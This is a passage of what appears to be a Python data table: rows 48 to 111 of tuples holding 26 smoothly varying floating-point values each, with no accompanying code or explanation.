(14.457477229403315, 13.422977469135803, 11.923095679012349, 12.839917708333335, 10.477815738876558, 5.104166666666667, 5.508131481481482, 4.861986111111112, 5.587528333333333, 2.618136543209877, 1.9324835578002246, 1.1133572016460909, 0.0, 14.175, 12.246929218106997, 9.662417789001124, 7.854409629629629, 11.175056666666666, 6.806780555555557, 5.508131481481482, 3.6458333333333335, 5.238907869438279, 4.279972569444446, 2.38461913580247, 1.2202706790123459, 0.0), # 48
(14.464161513687602, 13.377393609967992, 11.910863283036125, 12.829133063271607, 10.480022934436168, 5.104166666666667, 5.490677430807714, 4.829409465020577, 5.582675288065844, 2.6092944741655244, 1.930913046098849, 1.1117262155159278, 0.0, 14.175, 12.228988370675204, 9.654565230494246, 7.827883422496572, 11.165350576131688, 6.761173251028807, 5.490677430807714, 3.6458333333333335, 5.240011467218084, 4.276377687757203, 2.382172656607225, 1.2161266918152722, 0.0), # 49
(14.470504018511264, 13.33119713077275, 11.89841963877458, 12.81810860339506, 10.482115503256427, 5.104166666666667, 5.473000383280885, 4.796746399176955, 5.57772890946502, 2.6003663694558763, 1.9293009830818477, 1.1100670629477218, 0.0, 14.175, 12.210737692424937, 9.646504915409238, 7.8010991083676275, 11.15545781893004, 6.715444958847738, 5.473000383280885, 3.6458333333333335, 5.2410577516282135, 4.272702867798355, 2.379683927754916, 1.211927011888432, 0.0), # 50
(14.476503629716676, 13.284472530864198, 11.885783950617286, 12.806857291666669, 10.484093274023598, 5.104166666666667, 5.455133551198258, 4.764083333333335, 5.572696111111112, 2.5913710493827167, 1.9276487654320995, 1.1083823045267494, 0.0, 14.175, 12.192205349794241, 9.638243827160496, 7.774113148148149, 11.145392222222224, 6.669716666666668, 5.455133551198258, 3.6458333333333335, 5.242046637011799, 4.268952430555557, 2.377156790123457, 1.2076793209876546, 0.0), # 51
(14.482159233146191, 13.237304309556471, 11.87297542295382, 12.795392091049385, 10.485956075423934, 5.104166666666667, 5.437110146857097, 4.731506687242798, 5.567583806584363, 2.582327334247829, 1.9259577898324816, 1.1066745008382872, 0.0, 14.175, 12.173419509221157, 9.629788949162407, 7.746982002743485, 11.135167613168726, 6.624109362139918, 5.437110146857097, 3.6458333333333335, 5.242978037711967, 4.265130697016462, 2.3745950845907644, 1.2033913008687704, 0.0), # 52
(14.487469714642183, 13.189776966163697, 11.860013260173757, 12.783725964506175, 10.487703736143693, 5.104166666666667, 5.418963382554669, 4.699102880658437, 5.5623989094650215, 2.573254044352996, 1.9242294529658732, 1.104946212467612, 0.0, 14.175, 12.15440833714373, 9.621147264829364, 7.719762133058986, 11.124797818930043, 6.578744032921811, 5.418963382554669, 3.6458333333333335, 5.243851868071847, 4.261241988168726, 2.3720026520347517, 1.199070633287609, 0.0), # 53
(14.492433960047004, 13.141975000000002, 11.846916666666667, 12.771871875000002, 10.489336084869135, 5.104166666666667, 5.400726470588236, 4.6669583333333335, 5.557148333333334, 2.5641700000000007, 1.9224651515151516, 1.1032000000000002, 0.0, 14.175, 12.1352, 9.612325757575757, 7.69251, 11.114296666666668, 6.533741666666667, 5.400726470588236, 3.6458333333333335, 5.244668042434568, 4.257290625000001, 2.369383333333334, 1.1947250000000003, 0.0), # 54
(14.497050855203032, 13.093982910379516, 11.833704846822133, 12.759842785493827, 10.490852950286511, 5.104166666666667, 5.382432623255064, 4.6351594650205765, 5.551838991769547, 2.555094021490627, 1.9206662821631961, 1.101438424020729, 0.0, 14.175, 12.115822664228014, 9.603331410815981, 7.66528206447188, 11.103677983539095, 6.4892232510288075, 5.382432623255064, 3.6458333333333335, 5.2454264751432556, 4.253280928497944, 2.3667409693644266, 1.1903620827617745, 0.0), # 55
(14.501319285952622, 13.045885196616371, 11.820397005029724, 12.74765165895062, 10.492254161082082, 5.104166666666667, 5.3641150528524175, 4.603792695473252, 5.5464777983539095, 2.5460449291266585, 1.918834241592884, 1.099664045115074, 0.0, 14.175, 12.096304496265812, 9.59417120796442, 7.638134787379974, 11.092955596707819, 6.445309773662553, 5.3641150528524175, 3.6458333333333335, 5.246127080541041, 4.249217219650207, 2.3640794010059447, 1.1859895633287612, 0.0), # 56
(14.505238138138138, 12.997766358024693, 11.807012345679016, 12.735311458333335, 10.493539545942102, 5.104166666666667, 5.34580697167756, 4.572944444444445, 5.541071666666667, 2.5370415432098774, 1.9169704264870937, 1.097879423868313, 0.0, 14.175, 12.076673662551439, 9.584852132435467, 7.61112462962963, 11.082143333333335, 6.402122222222224, 5.34580697167756, 3.6458333333333335, 5.246769772971051, 4.245103819444446, 2.3614024691358035, 1.1816151234567904, 0.0), # 57
(14.508806297601952, 12.949710893918612, 11.79357007315958, 12.72283514660494, 10.494708933552829, 5.104166666666667, 5.3275415920277585, 4.5427011316872425, 5.535627510288066, 2.5281026840420675, 1.9150762335287033, 1.096087120865722, 0.0, 14.175, 12.05695832952294, 9.575381167643515, 7.584308052126201, 11.071255020576132, 6.35978158436214, 5.3275415920277585, 3.6458333333333335, 5.2473544667764145, 4.240945048868314, 2.3587140146319165, 1.1772464449016922, 0.0), # 58
(14.51202265018642, 12.901803303612255, 11.780089391860999, 12.710235686728396, 10.495762152600523, 5.104166666666667, 5.309352126200275, 4.513149176954733, 5.530152242798355, 2.5192471719250125, 1.9131530594005905, 1.0942896966925775, 0.0, 14.175, 12.037186663618352, 9.565765297002951, 7.557741515775036, 11.06030448559671, 6.3184088477366265, 5.309352126200275, 3.6458333333333335, 5.247881076300262, 4.2367452289094665, 2.3560178783722, 1.172891209419296, 0.0), # 59
(14.51488608173391, 12.854128086419754, 11.76658950617284, 12.697526041666668, 10.496699031771435, 5.104166666666667, 5.291271786492374, 4.484375000000001, 5.524652777777779, 2.5104938271604946, 1.9112023007856345, 1.0924897119341568, 0.0, 14.175, 12.017386831275722, 9.556011503928172, 7.5314814814814826, 11.049305555555557, 6.278125000000001, 5.291271786492374, 3.6458333333333335, 5.248349515885717, 4.232508680555557, 2.353317901234568, 1.1685570987654323, 0.0), # 60
(14.517395478086781, 12.806769741655238, 11.753089620484685, 12.684719174382717, 10.497519399751823, 5.104166666666667, 5.273333785201324, 4.4564650205761325, 5.519136028806585, 2.501861470050298, 1.9092253543667126, 1.0906897271757356, 0.0, 14.175, 11.997586998933091, 9.546126771833563, 7.5055844101508935, 11.03827205761317, 6.2390510288065855, 5.273333785201324, 3.6458333333333335, 5.248759699875912, 4.22823972479424, 2.350617924096937, 1.1642517946959308, 0.0), # 61
(14.519549725087407, 12.759812768632832, 11.739608939186102, 12.671828047839508, 10.498223085227952, 5.104166666666667, 5.255571334624385, 4.429505658436215, 5.513608909465021, 2.4933689208962058, 1.9072236168267036, 1.0888923030025914, 0.0, 14.175, 11.977815333028504, 9.536118084133516, 7.4801067626886155, 11.027217818930042, 6.201307921810701, 5.255571334624385, 3.6458333333333335, 5.249111542613976, 4.2239426826131705, 2.3479217878372207, 1.1599829789666212, 0.0), # 62
(14.521347708578144, 12.713341666666667, 11.72616666666667, 12.658865625, 10.498809916886067, 5.104166666666667, 5.238017647058824, 4.4035833333333345, 5.508078333333334, 2.4850350000000003, 1.9051984848484853, 1.0871000000000002, 0.0, 14.175, 11.9581, 9.525992424242425, 7.455105, 11.016156666666667, 6.165016666666668, 5.238017647058824, 3.6458333333333335, 5.249404958443034, 4.219621875000001, 2.345233333333334, 1.1557583333333337, 0.0), # 63
(14.522788314401359, 12.667440935070873, 11.712782007315958, 12.645844868827162, 10.499279723412432, 5.104166666666667, 5.220705934801905, 4.378784465020577, 5.50255121399177, 2.4768785276634664, 1.9031513551149353, 1.0853153787532392, 0.0, 14.175, 11.938469166285628, 9.515756775574676, 7.430635582990398, 11.00510242798354, 6.130298251028808, 5.220705934801905, 3.6458333333333335, 5.249639861706216, 4.215281622942388, 2.342556401463192, 1.151585539551898, 0.0), # 64
(14.523870428399414, 12.62219507315958, 11.69947416552355, 12.63277874228395, 10.499632333493302, 5.104166666666667, 5.2036694101508925, 4.35519547325103, 5.497034465020577, 2.4689183241883863, 1.9010836243089335, 1.0835409998475842, 0.0, 14.175, 11.918950998323425, 9.505418121544666, 7.406754972565158, 10.994068930041154, 6.097273662551442, 5.2036694101508925, 3.6458333333333335, 5.249816166746651, 4.2109262474279845, 2.3398948331047102, 1.1474722793781438, 0.0), # 65
(14.524592936414676, 12.577688580246916, 11.686262345679015, 12.619680208333333, 10.499867575814935, 5.104166666666667, 5.1869412854030505, 4.332902777777779, 5.491535000000001, 2.4611732098765438, 1.898996689113356, 1.0817794238683132, 0.0, 14.175, 11.899573662551441, 9.49498344556678, 7.38351962962963, 10.983070000000001, 6.06606388888889, 5.1869412854030505, 3.6458333333333335, 5.249933787907468, 4.206560069444445, 2.337252469135803, 1.1434262345679016, 0.0), # 66
(14.524954724289511, 12.534005955647004, 11.673165752171926, 12.606562229938273, 10.499985279063587, 5.104166666666667, 5.1705547728556445, 4.311992798353911, 5.486059732510288, 2.453662005029722, 1.8968919462110825, 1.0800332114007012, 0.0, 14.175, 11.88036532540771, 9.484459731055413, 7.360986015089164, 10.972119465020576, 6.036789917695475, 5.1705547728556445, 3.6458333333333335, 5.2499926395317935, 4.202187409979425, 2.3346331504343856, 1.1394550868770006, 0.0), # 67
(14.524708260273156, 12.491002420461081, 11.660140274919984, 12.593323827495976, 10.499886091610856, 5.104071942793273, 5.154460636380753, 4.292367245846671, 5.480574329370524, 2.446367154576509, 1.894733397326088, 1.078295169221637, 0.0, 14.174825210048013, 11.861246861438005, 9.47366698663044, 7.339101463729525, 10.961148658741047, 6.009314144185339, 5.154460636380753, 3.6457656734237665, 5.249943045805428, 4.197774609165326, 2.3320280549839967, 1.135545674587371, 0.0), # 68
(14.522398389694043, 12.44736508363202, 11.646819830246914, 12.579297690217391, 10.498983297022512, 5.1033231138545965, 5.13818772694263, 4.272974279835392, 5.474838991769548, 2.439082236746551, 1.8923013290802768, 1.0765088802252547, 0.0, 14.17344039351852, 11.8415976824778, 9.461506645401384, 7.317246710239651, 10.949677983539097, 5.982163991769549, 5.13818772694263, 3.6452307956104257, 5.249491648511256, 4.193099230072464, 2.329363966049383, 1.1315786439665476, 0.0), # 69
(14.517840102582454, 12.402893656798973, 11.633146504915409, 12.564391480475042, 10.49719935985368, 5.101848358989992, 5.121662094192959, 4.253638926992837, 5.468821349641823, 2.4317718335619576, 1.8895680735227522, 1.0746659888174948, 0.0, 14.170705268347055, 11.82132587699244, 9.447840367613761, 7.295315500685872, 10.937642699283646, 5.955094497789972, 5.121662094192959, 3.6441773992785653, 5.24859967992684, 4.188130493491681, 2.326629300983082, 1.127535786981725, 0.0), # 70
(14.511097524900102, 12.357614716359132, 11.619125100022863, 12.548627178945251, 10.49455687350386, 5.0996715769953775, 5.104891161677292, 4.234367588782199, 5.462530365035819, 2.4244361257699243, 1.8865437198495683, 1.072767842674817, 0.0, 14.166655842764062, 11.800446269422984, 9.43271859924784, 7.273308377309771, 10.925060730071637, 5.928114624295079, 5.104891161677292, 3.642622554996698, 5.24727843675193, 4.182875726315085, 2.323825020004573, 1.1234195196690122, 0.0), # 71
(14.502234782608697, 12.311554838709677, 11.604760416666666, 12.532026766304348, 10.49107843137255, 5.096816666666667, 5.087882352941177, 4.215166666666667, 5.4559750000000005, 2.4170752941176477, 1.8832383572567788, 1.0708157894736845, 0.0, 14.161328125, 11.778973684210527, 9.416191786283894, 7.251225882352942, 10.911950000000001, 5.901233333333334, 5.087882352941177, 3.6405833333333337, 5.245539215686275, 4.177342255434784, 2.3209520833333337, 1.1192322580645162, 0.0), # 72
(14.491316001669949, 12.264740600247798, 11.590057255944217, 12.514612223228664, 10.486786626859248, 5.0933075267997765, 5.070643091530164, 4.196042562109436, 5.4491642165828384, 2.409689519352323, 1.8796620749404376, 1.0688111768905575, 0.0, 14.154758123285324, 11.75692294579613, 9.398310374702186, 7.229068558056968, 10.898328433165677, 5.8744595869532095, 5.070643091530164, 3.638076804856983, 5.243393313429624, 4.171537407742889, 2.3180114511888434, 1.1149764182043456, 0.0), # 73
(14.478405308045566, 12.21719857737068, 11.575020418952905, 12.496405530394526, 10.481704053363458, 5.089168056190623, 5.053180800989806, 4.177001676573693, 5.4421069768328, 2.402278982221147, 1.8758249620965999, 1.0667553526018982, 0.0, 14.146981845850483, 11.734308878620878, 9.379124810482999, 7.20683694666344, 10.8842139536656, 5.84780234720317, 5.053180800989806, 3.635120040136159, 5.240852026681729, 4.165468510131509, 2.315004083790581, 1.1106544161246077, 0.0), # 74
(14.463566827697262, 12.168955346475506, 11.559654706790123, 12.477428668478263, 10.475853304284678, 5.084422153635118, 5.03550290486565, 4.158050411522635, 5.434812242798353, 2.394843863471315, 1.8717371079213185, 1.0646496642841674, 0.0, 14.138035300925928, 11.711146307125839, 9.358685539606592, 7.184531590413944, 10.869624485596706, 5.821270576131688, 5.03550290486565, 3.63173010973937, 5.237926652142339, 4.159142889492755, 2.311930941358025, 1.10626866786141, 0.0), # 75
(14.44686468658675, 12.12003748395947, 11.543964920553272, 12.457703618156202, 10.469256973022405, 5.079093717929179, 5.017616826703247, 4.139195168419449, 5.427288976527969, 2.3873843438500235, 1.8674086016106486, 1.0624954596138265, 0.0, 14.127954496742113, 11.68745005575209, 9.337043008053241, 7.162153031550069, 10.854577953055937, 5.794873235787229, 5.017616826703247, 3.6279240842351275, 5.234628486511203, 4.152567872718735, 2.3087929841106543, 1.101821589450861, 0.0), # 76
(14.428363010675731, 12.070471566219748, 11.527955861339734, 12.43725236010467, 10.461937652976141, 5.07320664786872, 4.9995299900481465, 4.120442348727329, 5.4195461400701115, 2.3799006041044684, 1.8628495323606438, 1.0602940862673376, 0.0, 14.116775441529496, 11.663234948940712, 9.314247661803218, 7.139701812313404, 10.839092280140223, 5.768619288218261, 4.9995299900481465, 3.623719034191943, 5.230968826488071, 4.145750786701558, 2.305591172267947, 1.0973155969290682, 0.0), # 77
(14.408125925925928, 12.020284169653527, 11.511632330246915, 12.416096875000001, 10.45391793754539, 5.066784842249657, 4.981249818445898, 4.101798353909466, 5.41159269547325, 2.372392824981845, 1.8580699893673582, 1.0580468919211612, 0.0, 14.10453414351852, 11.638515811132772, 9.29034994683679, 7.1171784749455345, 10.8231853909465, 5.742517695473253, 4.981249818445898, 3.6191320301783265, 5.226958968772695, 4.138698958333334, 2.3023264660493834, 1.092753106332139, 0.0), # 78
(14.386217558299041, 11.969501870657995, 11.494999128372202, 12.394259143518521, 10.445220420129644, 5.0598521998679065, 4.962783735442051, 4.0832695854290515, 5.403437604785855, 2.3648611872293506, 1.8530800618268455, 1.0557552242517592, 0.0, 14.091266610939643, 11.613307466769347, 9.265400309134227, 7.094583561688051, 10.80687520957171, 5.716577419600672, 4.962783735442051, 3.61418014276279, 5.222610210064822, 4.131419714506174, 2.2989998256744406, 1.0881365336961817, 0.0), # 79
(14.362702033756786, 11.918151245630337, 11.478061056812987, 12.371761146336556, 10.435867694128408, 5.052432619519382, 4.9441391645821575, 4.064862444749277, 5.395089830056394, 2.35730587159418, 1.847889838935161, 1.0534204309355928, 0.0, 14.07700885202332, 11.587624740291517, 9.239449194675805, 7.071917614782539, 10.790179660112788, 5.690807422648988, 4.9441391645821575, 3.6088804425138443, 5.217933847064204, 4.123920382112186, 2.2956122113625974, 1.0834682950573036, 0.0), # 80
(14.337643478260873, 11.866258870967743, 11.460822916666668, 12.348624864130437, 10.425882352941176, 5.04455, 4.925323529411765, 4.046583333333334, 5.386558333333333, 2.34972705882353, 1.8425094098883579, 1.0510438596491232, 0.0, 14.061796875, 11.561482456140352, 9.212547049441788, 7.049181176470589, 10.773116666666667, 5.665216666666669, 4.925323529411765, 3.60325, 5.212941176470588, 4.11620828804348, 2.2921645833333337, 1.0787508064516131, 0.0), # 81
(14.311106017773009, 11.813851323067393, 11.443289509030638, 12.32487227757649, 10.415286989967456, 5.036228240105676, 4.906344253476426, 4.0284386526444145, 5.3778520766651425, 2.342124929664596, 1.83694886388249, 1.048626858068812, 0.0, 14.045666688100141, 11.53489543875693, 9.18474431941245, 7.026374788993786, 10.755704153330285, 5.63981411370218, 4.906344253476426, 3.5973058857897686, 5.207643494983728, 4.1082907591921645, 2.2886579018061277, 1.0739864839152178, 0.0), # 82
(14.283153778254908, 11.760955178326475, 11.425465635002288, 12.300525367351046, 10.40410419860674, 5.027491238632323, 4.887208760321688, 4.01043480414571, 5.368980022100289, 2.3344996648645746, 1.8312182901136123, 1.0461707738711208, 0.0, 14.028654299554185, 11.507878512582325, 9.156091450568061, 7.0034989945937225, 10.737960044200578, 5.614608725803994, 4.887208760321688, 3.5910651704516594, 5.20205209930337, 4.1001751224503495, 2.2850931270004575, 1.0691777434842251, 0.0), # 83
(14.253850885668278, 11.707597013142175, 11.407356095679013, 12.275606114130436, 10.392356572258533, 5.0183628943758585, 4.867924473493101, 3.9925781893004118, 5.359951131687243, 2.3268514451706617, 1.825327777777778, 1.0436769547325107, 0.0, 14.010795717592593, 11.480446502057614, 9.12663888888889, 6.980554335511984, 10.719902263374486, 5.589609465020577, 4.867924473493101, 3.5845449245541845, 5.196178286129267, 4.091868704710146, 2.281471219135803, 1.0643270011947434, 0.0), # 84
(14.223261465974833, 11.653803403911677, 11.388965692158209, 12.250136498590983, 10.380066704322333, 5.008867106132196, 4.8484988165362175, 3.974875209571713, 5.35077436747447, 2.3191804513300527, 1.8192874160710422, 1.041146748329443, 0.0, 13.992126950445819, 11.452614231623869, 9.09643708035521, 6.957541353990157, 10.70154873494894, 5.564825293400398, 4.8484988165362175, 3.577762218665854, 5.190033352161167, 4.083378832863662, 2.2777931384316417, 1.05943667308288, 0.0), # 85
(14.191449645136279, 11.59960092703217, 11.370299225537268, 12.224138501409021, 10.367257188197637, 4.999027772697253, 4.828939212996585, 3.9573322664228017, 5.341458691510441, 2.311486864089944, 1.8131072941894584, 1.0385815023383795, 0.0, 13.97268400634431, 11.424396525722173, 9.065536470947292, 6.934460592269831, 10.682917383020882, 5.540265172991923, 4.828939212996585, 3.57073412335518, 5.183628594098819, 4.074712833803008, 2.274059845107454, 1.0545091751847429, 0.0), # 86
(14.15847954911433, 11.545016158900838, 11.35136149691358, 12.19763410326087, 10.353950617283953, 4.988868792866941, 4.809253086419753, 3.939955761316873, 5.332013065843622, 2.3037708641975314, 1.8067975013290805, 1.035982564435781, 0.0, 13.95250289351852, 11.39580820879359, 9.033987506645403, 6.9113125925925925, 10.664026131687244, 5.515938065843622, 4.809253086419753, 3.563477709190672, 5.1769753086419765, 4.065878034420291, 2.2702722993827162, 1.0495469235364399, 0.0), # 87
(14.124415303870702, 11.490075675914863, 11.332157307384547, 12.170645284822868, 10.340169584980769, 4.97841406543718, 4.789447860351274, 3.9227520957171165, 5.322446452522482, 2.296032632400011, 1.8003681266859632, 1.0333512822981095, 0.0, 13.931619620198905, 11.366864105279202, 9.001840633429817, 6.888097897200032, 10.644892905044964, 5.491852934003963, 4.789447860351274, 3.556010046740843, 5.1700847924903846, 4.056881761607624, 2.2664314614769094, 1.0445523341740786, 0.0), # 88
(14.089321035367092, 11.434806054471437, 11.312691458047555, 12.143194026771337, 10.325936684687594, 4.967687489203883, 4.769530958336696, 3.905727671086725, 5.312767813595489, 2.2882723494445796, 1.7938292594561607, 1.030689003601826, 0.0, 13.910070194615912, 11.337579039620083, 8.969146297280803, 6.864817048333737, 10.625535627190978, 5.4680187395214155, 4.769530958336696, 3.548348206574202, 5.162968342343797, 4.047731342257113, 2.2625382916095114, 1.0395278231337672, 0.0), # 89
(14.053260869565218, 11.379233870967743, 11.292968750000002, 12.115302309782612, 10.311274509803923, 4.956712962962964, 4.749509803921569, 3.8888888888888893, 5.302986111111112, 2.280490196078432, 1.787190988835726, 1.027997076023392, 0.0, 13.887890625, 11.30796783625731, 8.93595494417863, 6.841470588235294, 10.605972222222224, 5.4444444444444455, 4.749509803921569, 3.54050925925926, 5.155637254901961, 4.0384341032608715, 2.2585937500000006, 1.0344758064516133, 0.0), # 90
(14.016298932426789, 11.323385701800964, 11.272993984339278, 12.086992114533015, 10.296205653729254, 4.945514385510339, 4.729391820651443, 3.8722421505868017, 5.293110307117818, 2.2726863530487647, 1.7804634040207143, 1.025276847239269, 0.0, 13.865116919581618, 11.278045319631957, 8.902317020103572, 6.818059059146293, 10.586220614235636, 5.4211390108215225, 4.729391820651443, 3.5325102753645283, 5.148102826864627, 4.0289973715110055, 2.254598796867856, 1.0293987001637241, 0.0), # 91
(13.978499349913523, 11.267288123368292, 11.252771962162782, 12.058285421698875, 10.280752709863094, 4.934115655641925, 4.709184432071869, 3.8557938576436523, 5.2831493636640765, 2.2648610011027737, 1.7736565942071794, 1.0225296649259181, 0.0, 13.841785086591221, 11.247826314185097, 8.868282971035896, 6.79458300330832, 10.566298727328153, 5.398111400701113, 4.709184432071869, 3.524368325458518, 5.140376354931547, 4.019428473899626, 2.2505543924325564, 1.0242989203062085, 0.0), # 92
(13.939926247987117, 11.210967712066907, 11.232307484567903, 12.029204211956525, 10.264938271604938, 4.9225406721536356, 4.688895061728395, 3.839550411522634, 5.273112242798354, 2.2570143209876545, 1.7667806485911755, 1.019756876759801, 0.0, 13.81793113425926, 11.217325644357809, 8.833903242955877, 6.771042962962962, 10.546224485596708, 5.375370576131688, 4.688895061728395, 3.5161004801097393, 5.132469135802469, 4.009734737318842, 2.246461496913581, 1.0191788829151736, 0.0), # 93
(13.900643752609293, 11.154451044293994, 11.211605352652038, 11.999770465982289, 10.248784932354287, 4.910813333841387, 4.6685311331665735, 3.8235182136869392, 5.263007906569121, 2.2491464934506045, 1.7598456563687561, 1.016959830417379, 0.0, 13.793591070816188, 11.186558134591166, 8.79922828184378, 6.747439480351812, 10.526015813138242, 5.3529254991617155, 4.6685311331665735, 3.5077238098867047, 5.124392466177143, 3.9999234886607637, 2.2423210705304077, 1.014041004026727, 0.0), # 94
(13.860715989741754, 11.097764696446747, 11.190670367512576, 11.970006164452498, 10.232315285510639, 4.898957539501094, 4.648100069931951, 3.807703665599757, 5.252845317024844, 2.241257699238818, 1.752861706735976, 1.014139873575113, 0.0, 13.768800904492457, 11.155538609326241, 8.764308533679879, 6.723773097716453, 10.505690634049689, 5.33078513183966, 4.648100069931951, 3.499255385357924, 5.1161576427553195, 3.9900020548175, 2.2381340735025153, 1.0088876996769771, 0.0), # 95
(13.820207085346219, 11.040935244922345, 11.169507330246915, 11.93993328804348, 10.215551924473493, 4.88699718792867, 4.62760929557008, 3.7921131687242804, 5.242633436213992, 2.2333481190994924, 1.7458388888888892, 1.0112983539094653, 0.0, 13.74359664351852, 11.124281893004117, 8.729194444444445, 6.700044357298475, 10.485266872427983, 5.3089584362139925, 4.62760929557008, 3.490712277091907, 5.1077759622367465, 3.9799777626811608, 2.2339014660493834, 1.0037213859020315, 0.0), # 96
(13.779181165384388, 10.983989266117973, 11.148121041952448, 11.909573817431562, 10.198517442642354, 4.8749561779200326, 4.60706623362651, 3.7767531245237014, 5.2323812261850335, 2.2254179337798226, 1.7387872920235496, 1.0084366190968967, 0.0, 13.718014296124831, 11.09280281006586, 8.693936460117747, 6.676253801339467, 10.464762452370067, 5.287454374333182, 4.60706623362651, 3.482111555657166, 5.099258721321177, 3.969857939143855, 2.2296242083904896, 0.9985444787379977, 0.0), # 97
(13.737702355817978, 10.926953336430817, 11.126516303726566, 11.878949733293078, 10.181234433416716, 4.862858408271099, 4.58647830764679, 3.7616299344612103, 5.222097648986434, 2.2174673240270053, 1.7317170053360116, 1.0055560168138682, 0.0, 13.69208987054184, 11.06111618495255, 8.658585026680058, 6.652401972081014, 10.444195297972868, 5.266281908245695, 4.58647830764679, 3.4734702916222133, 5.090617216708358, 3.9596499110976935, 2.2253032607453136, 0.9933593942209834, 0.0), # 98
(13.695834782608697, 10.869854032258065, 11.10469791666667, 11.848083016304349, 10.163725490196079, 4.850727777777779, 4.5658529411764714, 3.7467500000000005, 5.211791666666667, 2.2094964705882356, 1.724638118022329, 1.0026578947368423, 0.0, 13.665859375000002, 11.029236842105265, 8.623190590111644, 6.628489411764706, 10.423583333333333, 5.245450000000001, 4.5658529411764714, 3.4648055555555564, 5.081862745098039, 3.949361005434784, 2.220939583333334, 0.988168548387097, 0.0), # 99
(13.653642571718258, 10.8127179299969, 11.082670681870143, 11.816995647141708, 10.146013206379946, 4.8385881852359915, 4.545197557761102, 3.732119722603262, 5.201472241274196, 2.201505554210711, 1.717560719278556, 0.9997436005422796, 0.0, 13.639358817729768, 10.997179605965075, 8.58780359639278, 6.6045166626321326, 10.402944482548392, 5.224967611644567, 4.545197557761102, 3.456134418025708, 5.073006603189973, 3.938998549047237, 2.2165341363740287, 0.9829743572724456, 0.0), # 100
(13.611189849108369, 10.755571606044516, 11.060439400434387, 11.785709606481484, 10.128120175367815, 4.82646352944165, 4.524519580946234, 3.7177455037341867, 5.191148334857491, 2.1934947556416264, 1.7104948983007466, 0.9968144819066413, 0.0, 13.612624206961591, 10.964959300973053, 8.552474491503732, 6.580484266924878, 10.382296669714982, 5.204843705227861, 4.524519580946234, 3.4474739496011786, 5.064060087683908, 3.928569868827162, 2.2120878800868775, 0.977779236913138, 0.0), # 101
(13.568540740740744, 10.698441636798089, 11.038008873456791, 11.754246875000002, 10.110068990559187, 4.814377709190674, 4.503826434277415, 3.7036337448559675, 5.180828909465021, 2.1854642556281783, 1.7034507442849551, 0.9938718865063897, 0.0, 13.585691550925928, 10.932590751570284, 8.517253721424776, 6.556392766884533, 10.361657818930041, 5.185087242798355, 4.503826434277415, 3.438841220850481, 5.055034495279593, 3.918082291666668, 2.207601774691358, 0.972585603345281, 0.0), # 102
(13.525759372577088, 10.641354598654807, 11.015383902034753, 11.722629433373593, 10.09188224535356, 4.802354623278973, 4.483125541300197, 3.689790847431795, 5.170522927145252, 2.1774142349175616, 1.696438346427236, 0.9909171620179854, 0.0, 13.558596857853223, 10.900088782197837, 8.482191732136178, 6.532242704752683, 10.341045854290504, 5.1657071864045125, 4.483125541300197, 3.4302533023421233, 5.04594112267678, 3.907543144457865, 2.2030767804069504, 0.9673958726049827, 0.0), # 103
(13.482909870579116, 10.58433706801186, 10.992569287265662, 11.690879262278584, 10.073582533150434, 4.790418170502465, 4.462424325560129, 3.6762232129248593, 5.160239349946655, 2.1693448742569736, 1.689467793923642, 0.9879516561178898, 0.0, 13.53137613597394, 10.867468217296787, 8.447338969618208, 6.50803462277092, 10.32047869989331, 5.146712498094804, 4.462424325560129, 3.421727264644618, 5.036791266575217, 3.896959754092862, 2.1985138574531327, 0.9622124607283511, 0.0), # 104
(13.440056360708535, 10.527415621266428, 10.969569830246915, 11.659018342391304, 10.05519244734931, 4.778592249657065, 4.441730210602761, 3.662937242798354, 5.1499871399176955, 2.1612563543936103, 1.682549175970229, 0.9849767164825647, 0.0, 13.50406539351852, 10.83474388130821, 8.412745879851144, 6.48376906318083, 10.299974279835391, 5.128112139917696, 4.441730210602761, 3.4132801783264752, 5.027596223674655, 3.886339447463769, 2.1939139660493834, 0.9570377837514936, 0.0), # 105
(13.39726296892706, 10.470616834815702, 10.946390332075904, 11.627068654388085, 10.036734581349688, 4.766900759538689, 4.4210506199736415, 3.6499393385154706, 5.139775259106843, 2.153148856074666, 1.67569258176305, 0.9819936907884712, 0.0, 13.476700638717421, 10.801930598673183, 8.378462908815248, 6.459446568223997, 10.279550518213686, 5.109915073921659, 4.4210506199736415, 3.4049291139562063, 5.018367290674844, 3.875689551462696, 2.189278066415181, 0.9518742577105185, 0.0), # 106
(13.3545938211964, 10.413967285056863, 10.923035593850026, 11.59505217894525, 10.018231528551063, 4.755367598943252, 4.400392977218323, 3.6372359015394005, 5.129612669562567, 2.145022560047339, 1.6689081004981592, 0.9790039267120707, 0.0, 13.449317879801098, 10.769043193832776, 8.344540502490794, 6.435067680142016, 10.259225339125134, 5.092130262155161, 4.400392977218323, 3.3966911421023225, 5.009115764275531, 3.865017392981751, 2.1846071187700056, 0.9467242986415331, 0.0), # 107
(13.312113043478263, 10.357493548387097, 10.899510416666669, 11.562990896739132, 9.999705882352941, 4.744016666666668, 4.379764705882353, 3.6248333333333345, 5.119508333333334, 2.1368776470588244, 1.662205821371611, 0.9760087719298248, 0.0, 13.421953125000002, 10.736096491228071, 8.311029106858054, 6.4106329411764715, 10.239016666666668, 5.074766666666668, 4.379764705882353, 3.3885833333333344, 4.999852941176471, 3.854330298913045, 2.179902083333334, 0.9415903225806455, 0.0), # 108
(13.26988476173436, 10.301222201203595, 10.87581960162323, 11.530906788446053, 9.98118023615482, 4.732871861504853, 4.359173229511284, 3.612738035360464, 5.109471212467612, 2.1287142978563174, 1.6555958335794598, 0.9730095741181947, 0.0, 13.394642382544584, 10.70310531530014, 8.277979167897298, 6.386142893568951, 10.218942424935223, 5.05783324950465, 4.359173229511284, 3.3806227582177515, 4.99059011807741, 3.8436355961486854, 2.1751639203246462, 0.9364747455639633, 0.0), # 109
(13.227973101926404, 10.245179819903537, 10.851967949817103, 11.498821834742351, 9.962677183356197, 4.721957082253722, 4.3386259716506625, 3.6009564090839814, 5.099510269013869, 2.1205326931870148, 1.6490882263177586, 0.9700076809536419, 0.0, 13.367421660665297, 10.670084490490058, 8.245441131588793, 6.361598079561043, 10.199020538027739, 5.041338972717574, 4.3386259716506625, 3.372826487324087, 4.981338591678099, 3.832940611580785, 2.170393589963421, 0.9313799836275944, 0.0), # 110
(13.186442190016104, 10.189392980884113, 10.827960262345682, 11.46675801630435, 9.944219317356573, 4.711296227709192, 4.318130355846042, 3.5894948559670787, 5.089634465020577, 2.1123330137981124, 1.6426930887825626, 0.9670044401126275, 0.0, 13.340326967592594, 10.6370488412389, 8.213465443912813, 6.336999041394336, 10.179268930041154, 5.02529279835391, 4.318130355846042, 3.3652115912208513, 4.972109658678287, 3.8222526721014507, 2.1655920524691368, 0.9263084528076467, 0.0), # 111
